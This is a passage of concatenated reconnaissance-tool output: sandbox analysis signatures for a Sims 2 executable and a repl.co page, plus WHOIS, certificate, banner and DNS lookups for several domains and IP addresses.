None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"%USERPROFILE%\\source\\repos\\Sims2RPCSettings\\Sims2RPCSettings\\obj\\Release\\Sims2RPCSettings.pdb"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-95', u'name': u'PE file contains writable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"Sims2EP9RPC.exe" has an writable section named ".data"\n "Sims2EP9RPC.exe" has an writable section named "PIXO_2D"\n "Sims2EP9RPC.exe" has an writable section named "STLPORT_"\n "Sims2EP9RPC.exe" has an writable section named "LBMPEG_D"\n "Sims2EP9RPC.exe" has an writable section named "Stext"\n "Sims2EP9RPC.exe" has an 
writable section named "Sdata"\n "Sims2EP9RPC.exe" has an writable section named "Sidata"\n "Sims2EP9RPC.exe" has an writable section named ".securom"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Tar3471.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-124', u'name': u'PE file has a big virtual size section', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 0, u'description': u'Virtual size of ".text" is "0x279750" greater than 0x100000\n Virtual size of ".text" is "0xdd2000" greater than 0x100000\n Virtual size of ".rdata" is "0x1e9000" greater than 0x100000\n Virtual size of ".data" is "0x104000" greater than 0x100000\n Virtual size of "Stext" is "0x6c8000" greater than 0x100000\n Virtual size of "Sdata" is "0x25d000" greater than 0x100000\n Virtual size of ".securom" is "0x11b94e0" greater than 0x100000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"74.114.154.18:443"\n "185.199.108.153:443"\n "34.149.204.188:443"'}, {u'category': u'General', u'origin': u'Registry Access', 
u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: 
"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES"; Key: "")\n "Sims2RPCSettings.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'Ge 34.149.204.188 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None ENOM, INC. Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. 
Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. 
We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://plague.fun/ plague.fun 2022-12-18 00:06:59 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://unwieldywetcondition.pedromedina8.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "173.222.100.91:80"\n "142.250.189.234:443"\n "142.250.191.35:80"\n "142.250.189.163:443"\n "184.31.203.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n 
"ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "unwieldywetcondition.pedromedina8.repl.co"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2C72.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CE1.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_320"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IE_EarlyTabStart_0x34c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_ConnHashTable<320>_HashTable_Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_140_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_140_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_140_IE_EarlyTabStart_0x34c_Mutex"\n "IsoScope_140_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_140_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab2CE0.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab2C61.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "S822N3FN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S822N3FN.txt]- [targetUID: 00000000-00002856]\n Dropped file: "8QR1102B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QR1102B.txt]- [targetUID: 00000000-00000320]\n Dropped file: "NI6OGMZX.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NI6OGMZX.txt]- [targetUID: 00000000-00000320]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': 
u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "S822N3FN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S822N3FN.txt]- [targetUID: 00000000-00002856]\n "~DF7E2A7E333D5EB1D1.TMP" has type "data"- Location: [%TEMP%\\~DF7E2A7E333D5EB1D1.TMP]- [targetUID: 00000000-00000320]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00000320]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002856]\n "RecoveryStore._F31FE297-4B11-11ED-BF0C-080027525002_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002856]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00002856]\n "265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\265C0DEB29181DD1891051371C5F863A_14F2E352CCFE495001982FFDAAC3BE84]- [targetUID: 00000000-00002856]\n 
"80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000320]\n "_FDAAC88E-4B11-11ED-BF0C-080027525002_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002856]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002856]\n "8QR1102B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QR1102B.txt]- [targetUID: 00000000-00000320]\n "~DFFE7FD93139B78B1E.TMP" has type "data"- Location: [%TEMP%\\~DFFE7FD93139B78B1E.TMP]- [targetUID: 00000000-00000320]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: unwieldywetcondition.pedromedina8.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "}\n\n @media (max-width: 500px) {\n .message 
{\n flex-direction: column;\n align-items: center;\n }\n }\n\n .eval-bot {\n margin: 4em;\n }\n\n .console {\n background-color: #0e1628;\n color: #fff;\n font-family: "IBM Plex Sans", "sans";\n padding: 1em;\n margin: 1em;\n }\n\n .footer-item {\n margin: 1em;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n .link-icon {\n margin-right: 8px;\n margin-top: 4px;\n }\n\n a {\n color: #c2c8cc;\n }\n \n\n \n \n\n \n
\n
\n
\n \n \n Not Found

404 - Not Found

\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Not Found", "protocol": "HTTP/1.1", "body_size": 88, "body_hashes": ["sha256:9112cd25c08247edd8945a300d21e1cba019358a92c58d593443c008e4119f64", "sha1:75710e20f9c5609e3325dd9805d690a3647f1af0"], "status_code": 404, "body_hash": "sha1:75710e20f9c5609e3325dd9805d690a3647f1af0", "headers": {"_encoding": {"Te": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8"}, "Te": ["chunked"], "Content_Type": ["text/html"]}, "html_tags": ["Not Found"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:33ba33c89a0dbfc718b2f90371a8c54fac320ec0f256108c802f929f8588d06a"], "source_ip": "167.248.133.60", "extended_service_name": "HTTP", "observed_at": "2022-12-17T01:52:06.091731713Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a54453a206368756e6b65640d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 404 Not Found\r\nTE: chunked\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n", "port": 50997}], "autonomous_system": {"bgp_prefix": "90.116.0.0/16", "country_code": "FR", "asn": 3215, "name": "France Telecom - Orange", "description": "France Telecom - Orange"}} 90.116.166.104 2022-12-18 00:21:23 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3032::ac43:be81 2022-12-18 00:14:31 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.97.9 2022-12-18 00:29:09 Similar Domain - Whois No Whois 0 0 2 0 None Domain name: plague.co.uk Registrant: TwentyTwenty Media Limited Registrant type: UK Limited Company, (Company number: 3730401) Registrant's address: Spectrum House 9 Bromells Road London SW4 0BN United Kingdom Data validation: Nominet was able to match the registrant's 
name and address against a 3rd party data source on 29-Mar-2017 Registrar: TwentyTwentyMedia Limited [Tag = TTMEDIA] Relevant dates: Registered on: 16-Apr-2003 Expiry date: 16-Apr-2023 Last updated: 21-Nov-2022 Registration status: Registered until expiry date. Name servers: ns1.tt550.parklogic.com ns2.tt550.parklogic.com WHOIS lookup made at 00:29:09 18-Dec-2022 -- This WHOIS information is provided for free by Nominet UK the central registry for .uk domain names. This information and the .uk WHOIS are: Copyright Nominet UK 1996 - 2022. You may not access the .uk WHOIS or use any data from it except as permitted by the terms of use available in full at https://www.nominet.uk/whoisterms, which includes restrictions on: (A) use of the data for advertising, or its repackaging, recompilation, redistribution or reuse (B) obscuring, removing or hiding any or all of this notice and (C) exceeding query rate or volume limits. The data is provided on an 'as-is' basis and may lag behind the register. Access may be withdrawn or restricted at any time. 
plague.co.uk 2022-12-18 00:19:10 Hosting Provider No Hosting Provider Identifier 0 0 3 0 None register.it: http://we.register.it/ 81.88.48.102 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 104.21.16.0/20 2022-12-18 00:03:06 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 20 21:09:20.492 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:FA:2E:39:B5:4A:7E:1E:99:95:86:B9: B3:8A:E4:80:9D:CD:AB:17:D7:B7:40:4F:C3:9B:ED:54: 
24:9C:11:BD:02:21:00:FD:45:FB:F2:A1:3E:CD:E8:A2: CC:34:29:02:72:8C:EB:99:C0:CA:A0:21:99:F7:A1:5B: C1:74:A7:32:F7:42:7F Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 20 21:09:20.448 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:FC:14:96:0B:ED:FC:D9:C5:2A:9E:6F: 52:EE:C7:06:D0:67:B9:01:DA:56:7D:5C:92:2F:10:76: DF:F1:5D:90:3E:02:21:00:B4:D1:00:98:21:12:BC:2A: 54:52:F2:E6:8B:33:79:69:58:57:C6:67:70:5C:DA:3B: E7:67:04:E5:84:09:7B:A8 Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:0c:9f:02:9e:a6:3f:cd:3b:85:32:2b:49:96:f2: 00:58:fd:40:65:de:b9:94:b5:11:ef:8a:23:0c:07:ec:f5:75: 18:07:07:24:15:e7:ea:8b:b4:36:77:75:83:eb:b0:3e:02:30: 2d:3e:43:61:54:0c:77:dc:17:fe:4d:45:de:d3:ad:b2:35:a2: 15:2e:45:32:25:68:c3:f7:9c:53:f8:b9:69:7b:8a:0e:27:5e: 8e:8c:9c:98:c5:ad:33:67:02:7f:98:09 2022-12-18 00:06:51 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.137.37:80 172.67.137.37 2022-12-18 00:04:10 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.96.0 2022-12-18 00:13:48 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None domregteam3@eurodns.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: putain.fr status: ACTIVE eppstatus: active hold: NO holder-c: ES5624-FRNIC admin-c: ES5623-FRNIC tech-c: AA4055-FRNIC registrar: EURODNS S.A. 
